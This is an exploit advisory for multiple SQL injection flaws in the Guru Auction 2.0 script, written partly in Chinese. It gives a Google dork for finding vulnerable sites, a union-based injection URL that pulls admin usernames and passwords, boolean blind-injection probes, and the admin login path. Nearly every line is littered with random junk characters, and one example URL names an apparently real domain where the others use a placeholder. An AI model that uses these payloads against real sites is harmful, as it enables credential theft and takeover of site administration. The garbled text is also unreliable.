Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
# y' w, X% u% T% |3 Z2 U) w6 u8 x: H3 k$ Q+ c! N" P' T. M
作者 : v3n0m3 Z' B" Z- Y7 H5 U& x5 |
应用 : Guru Auction 2.0; C9 a4 z, J$ w' A7 E
Price : $49% ~ S" q w) K' R' q
Vendor : http://www.guruscript.com/
4 |8 F. H% Y" n/ V7 e7 I* u/ iGoogle Dork : inurl:subcat.php?cate_id=1 o" O1 A8 e3 s. v! l4 n9 d
7 ~. Q3 n' ^: o. d5 K
SQLi p0c:
; B' S$ u9 T! U# j7 f~~~~~~~~~~
. a0 J& G- }* @http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--8 w( g% p) E( Z- E2 p6 ~: O
% }' M5 V$ U+ \' Z
+ ?7 V. [# s Z; f0 E' b& X盲注 p0c:- O" Y' R5 \0 v
~~~~~~~~~~; o' u. ~4 G/ q0 K* F
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true+ R+ f. s4 C0 w5 d7 S" Z
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false4 |- V B& i: f! ?% q1 k& b$ X
" Z2 S1 j2 G! a X3 Q7 j
管理登录入口:
+ d0 `. i% b" z8 K. \~~~~~~~~~~, n {6 ]* I( }0 \
http://domain.tld/[path]/admin/
2 K, A5 p' G% v0 u( X1 O4 Y |